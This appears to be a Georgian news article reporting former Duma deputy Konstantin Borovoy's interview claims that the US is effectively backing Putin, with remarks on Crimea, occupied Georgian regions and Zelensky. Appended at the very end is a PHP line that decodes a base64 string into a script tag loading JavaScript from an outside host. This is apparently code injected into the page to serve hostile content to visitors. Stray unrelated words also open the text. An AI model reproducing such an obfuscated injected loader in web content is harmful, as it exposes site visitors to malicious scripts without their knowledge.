celsiusi
ავერსი შნაიდერი
რუსეთის სახელმწიფო დუმის ყოფილი დეპუტატის, ოპოზიციონერი პოლიტიკოსი კონსტანტინ ბოროვოის განცხადებით, დღეს ამერიკის შეერთებული შტატები მხარს უჭერს პუტინს. ამის შესახებ მან რადიო "მაესტროსთან" ინტერვიუში რუსეთ–უკრაინის თემაზე საუბრისას განაცხადა. 
 
მისივე თქმით, ამ მხარდაჭერის ფორმალური მიზეზია ის, რომ რუსეთი ბირთვული იარაღის მქონე სახელმწიფოა და უკრაინისთვის პირდაპირი დახმარებამ შეიძლება ამერიკის შეერთებული შტატებისთვის საფრთხე შექმნას. 
 
"ამერიკის შეერთებული შტატები მხარს უჭერს პუტინს. ჩვენ ვიცით, რომ საქართველოზე რუსეთის თავდასხმის დროს ამერიკის შეერთებულმა შტატებმა პუტინს აჩვენა მზადყოფნა იმისა, რომ საქართველოს დაიცავდა, რამაც მაშინ პუტინი შეააჩერა. სამწუხაროდ, დღეს, სხვა ადმინისტრაციის, დემოკრატების ადმინისტრაციის პირობებში, მსგავსი ძალისხმევა უკრაინის მიმართ არ არსებობს. სხვა მიდგომებია, მაგრამ უკრაინა მამაცად იცავს არა მარტო საკუთარ თავს, არამედ ცივილიზებულ დასავლეთს, მათ შორის საქართველოსაც. საქართველო რჩება დღემდე რუსეთის მიერ ოკუპირებულად. აფხაზეთი, სამხრეთ ოსეთი. რუსეთის სპეცსამსახურების ნეგატიური გავლენა ჯერ კიდევ ძლიერია საქართველოზე. შესაბამისად, დღეს ჩვენ ყველანი ვლოცულობთ უკრაინის გამარჯვებაზე." – განაცხადა ბოროვოიმ.  
 
მან ასევე აღნიშნა, რომ ყირიმის დაპყრობა რუსული სპეციალური დანაყოფების მიერ ძალიან წარმატებით იყო განხორციელებული. მისი თქმით, ეს ყველაფერი ნატოს, ამერიკის შეერთებული შტატების, დასავლეთის უმოქმედობის ფონზე მოხდა, პრაქტიკულად პუტინს მისცეს "კარტ-ბლანში", მას მისცეს უფლება ყირიმის დაპყრობის. პუტინი ვარაუდობდა, რომ დაახლოებით იგივე მოხდებოდა დანარჩენ უკრაინასთან დაკავშირებით. 
 
"ჩვენ როგორც ვნახეთ, პირველი რეაქცია თეთრი სახლის, ამერიკის შეერთებული შტატების ხელმძღვანელობის იყოს ის, რომ ზელენსკის შეთავაზეს პოლიტიკური თავშესაფარი, რითაც მას უთხრეს რომ რუსეთისთვის არ გაეწია წინააღმდეგობა. მაგრამ, ზელენსკი - ის ხომ სხვა პრეზიდენტია, ის პოროშენკო ხომ არ არის, რომელმიც ყირიმის დათმობას დასთანხმდა. ზელენსკი ის პრეზიდენტია, რომელიც მზად არის დაიცვას უკრაინა, მე ვისურვებდი, რომ ჩვენ ყველას ზელენსკის მსგავსი პრეზიდენტი გვყავდეს. პრეზიდენტი, რომელიც მართლაც პატრიოტიზმით არის აღსავსე და მზადაა ჩევნი ქვეყნები დაიცვას." – აღნიშნა დუმის ყოფილმა დეპუტატმა.
 
ინტერვიუს სრული ვერსიის ნახვა შესაძლებელია აქ 
1508
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");